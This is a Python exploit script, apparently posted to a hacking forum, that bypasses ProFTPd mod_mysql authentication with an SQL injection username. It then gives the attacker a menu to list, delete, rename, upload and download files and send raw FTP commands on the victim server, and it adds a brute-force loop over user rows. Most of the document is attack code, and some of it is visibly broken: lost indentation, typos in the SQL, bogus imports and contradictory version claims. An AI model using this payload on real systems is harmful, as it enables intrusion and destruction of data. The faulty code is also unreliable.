#!/usr/bin/python# -*- coding: utf-8 -*-## ----------------------------------

1. #!/usr/bin/python
2. # -*- coding: utf-8 -*-
3.  
4. ## --------------------------------------------------------------------
5. ## ProFTPd with mod_mysql Authentication Bypass Exploit [PYTHON]
6. ## Code By NqrK
7. ## Powered By Python 2.6
8. ##
9. ##
10. ## --------------------------------------------------------------------
11. ## Class : Input Validation Error
12. ## Remote: Yes
13. ## Credit:
14. ## Page :
15. ##
16. ##
17. ##
18. ## --------------------------------------------------------------------
19. ##
20. ## to sufficiently sanitize user-supplied data before using it in an SQL query.
21. ##
22. ## modify data, or exploit latent vulnerabilities in the underlying database.
23. ## This may result in unauthorized access and a compromise of the application,
24. ## other attacks are also possible.
25. ## --------------------------------------------------------------------
26.  
27.  
28.  
29. import os
30. import sys
31. import ftplib
32. from ftplib import FTP
33. from Xlib.protocol.structs import Host
34. from __builtin__ import raw_input
35. from twisted.protocols import ftp
36.  
37. try:
38. os.system('color 0a')
39. os.system('title ProFTPd with mod_mysql Authetication Bypass Exploit')
40.  
41. except:
42. print("[!]You are in Unix, Change of exploit... [ok].")
43. print("[+]Run modules Unix_Kernel..[RUN].\n")
44.  
45.  
46. def Core():
47. """
48.  
49. """
50. print("\n\t[!]Please Choose a Command To Execut On ", Host, "\n")
51. print("[1] Show Files.")
52. print("[2] Delete Files.")
53. print("[3] Rename Files or Dir")
54. print("[4] Create Directory")
55. print("[5] Personnal Command")
56. print("[6] Download Files")
57. print("[7] Upload Files")
58. print("[8] Change Directory")
59. print("[9] Clear Console")
60. print("[0] Show Menu")
61. print("[E] Exit\n")
62.  
63. while (1):
64. cmd = raw_input("root@cmd ~ #")
65. if cmd == "1":
66. print("[!]Listing File On Server : ", Host, "...\n")
67. try:
68. ftp.retrlines('LIST')
69. print("[+]Listing File On", Host, "is SuccessFul !\n")
70.  
71. except:
72. print("[!] Cannot Listing File On", Host, "\n\a")
73. elif cmd == "2":
74. print("[!] Please Specify a File To Delete\n")
75. try:
76. File = raw_input("Remove File : ")
77. ftp.delete(File)
78. print("[+]File {", File, "} Deleted ! \n")
79. except:
80. print("[!] Cannot Deleting File On", Host, "\n\a")
81. elif cmd == "3":
82. print("[!] Please Speecify a File To Rename\n")
83. try:
84. File = raw_input("Rename File : ")
85. Rename = raw_input("New Name : ")
86. ftp.rename(File, Rename)
87. print("[+]File {", File, "} Renamed to {", Rename, "} \n")
88. except:
89. print("[!] Cannot Renamed File On", Host, "\n\a")
90. elif cmd == "4":
91. print("[!] Please Specify a Directory Name To create\n")
92. try:
93. DIR = raw_input("New Directory : ")
94. ftp.mkd(DIR)
95. print("[+]Create a New Directory !\n")
96. except:
97. print("[!] Cannot Created DIR On", Host, "\n\a")
98. elif cmd == "5":
99. print("[!] Please Enter you Command :")
100. print("[!] Enter ''/close'' for Exit Option\n")
101. while (1):
102. perso_cmd = raw_input("root@server ~ # ")
103. if perso_cmd == "/close":
104. break
105. else:
106. try:
107. request = ftp.sendcmd(perso_cmd)
108. print(request)
109. except:
110. print("[!]Command not Found On ", Host, "\n\a")
111. elif cmd == "6":
112. print("[!] Please Specify a Files Name To Download\n")
113. Rem_Files = raw_input("Download Files : ")
114. try:
115. ftp.sendcmd('GET '+ Rem_Files)
116. print("[+]File {", Rem_Files, "} Downloaded !\n")
117. except:
118. print("[!] Cannot Download Files On ", Host, "\n\a")
119. elif cmd == "7":
120. print("[!] Please Specify a Files Name To Upload\n")
121. try:
122. File = raw_input("Files : ")
123. upl = open(File, 'rb')
124. ftp.storbinary('STOR '+File, upl)
125. upl.close()
126. print("[+]File {", File,"} Uploaded !\n")
127. except:
128. print("[!] Cannot Upload Files On ", Host, "\n\a")
129. elif cmd == "8":
130. print("[!] Please Specify a Directory Name To Changed\n")
131. try:
132. Dir = raw_input("Directory : ")
133. ftp.sendcmd('CWD '+ Dir)
134. print("[+]Directory : ", Dir, "\n")
135. except:
136. print("[!] Cannot Changed Directory On ", Host, "\n\a")
137. elif cmd == "9":
138. try:
139. os.system('cls')
140. except:
141. os.system('clear')
142. elif cmd == "0":
143. print("\n\t[!]Please Choose a Chommand To Execut On ", Host, "\n")
144. print("[1] Show Files.")
145. print("[2] Delete Files.")
146. print("[3] Rename Files or Dir")
147. print("[4] Create Files or Dir")
148. print("[5] Personnal Command")
149. print("[6] Download Files")
150. print("[7] Upload Files")
151. print("[8] Change Directory")
152. print("[9] Clear Console")
153. print("[0] Show Menu")
154. print("[E] Exit\n")
155.  
156. elif cmd == "E":
157. ftp.quit()
158. print("[!]Disconnection.....[ok].\a")
159. print("[+]Unloading exploit....[ok].\a")
160. print("Exit...[OUT].\a\n")
161.  
162. raw_input("Press ENTER To Continue...")
163.  
164.  
165. break
166.  
167. def Brute():
168. print("\n\t=================================================")
169. print("\t [+] Attempting User Directory Discover Via FTP")
170. print("\t=================================================\n")
171. go = raw_input("[*] Target Online : ")
172. print("\n")
173. def brute():
174. for i in range(0, 31):
175. try:
176. username = "%') and 1 = 2 union select 1, 1uid, gid, homedir, shell from ftpuser LINIT "+str(i) +",1; --"
177. password = str("1")
178. ftp = FTP(go)
179. ftp.login(username, password)
180. print("\n\a\t[+] Logged in as user "+ str(i) +",1")
181. ftp.retrlines('LIST')
182. ftp.close()
183. except:
184. print("[!] Invalid USER ["+str(i)+"] number On ", go, "....Auto-Restart BruteForcer.")
185.  
186. brute()
187. print("\n[$] Brute-Force Finished..\n")
188. raw_input()
189. print("")
190. print("\t=========================================================")
191. print("\t[+] ProFTPd with mod_mysql Authentication Bypass Exploit")
192. print("\t[+] Credits Go For NqrK For Finding The Bug !")
193. print("\t [+]Exploited By NqrK")
194. print("\t [+]Forum.pr0ceed.net")
195. print("\t=========================================================\n\a")
196. user = "%') and 1=2 union select 1, 1uid, gid, homedir, shell from ftpuser, --"
197. passwd = "1"
198. Host = raw_input(" [*]Target: ")
199. print("\n\a [!] Attacking ", Host, "...\n")
200. try:
201. print("[+]Conneect to host [waiting please]...\n\a")
202. ftp = FTP(Host)
203. print("[+]Connected to ", Host, "\n\a")
204. try:
205. print("[+]loading exploit...Attacking..[Waiting Please]. \n")
206. ftp.login(user, passwd)
207. try:
208. print("[+]Attacking succeessful !\n\a")
209. print("[+]Exploit PWNED The Machine : ", Host, " Enter in Matrix...\a\n")
210. Core()
211. sys.exit()
212. except:
213. print("[!]END ProFTPd with mod_mysql Authentication Bypass Exploit in Python 3.5 By NqrK\n\a")
214. except:
215. print("[!] Couldn't ByPass The authentication !\a\n")
216. print("\n[+] Attempting User Directory Discover Via FTP [+]\n ")
217. choice = raw_input("(yes)/(no): ")
218. if choice == "yes":
219. Brute()
220. else:
221. pass
222.  
223.  
224.  
225. except:
226.  
227.  
228. print("[!] Cannot connect to ", Host, "\n\a")
229. raw_input()
230.  
231. ##END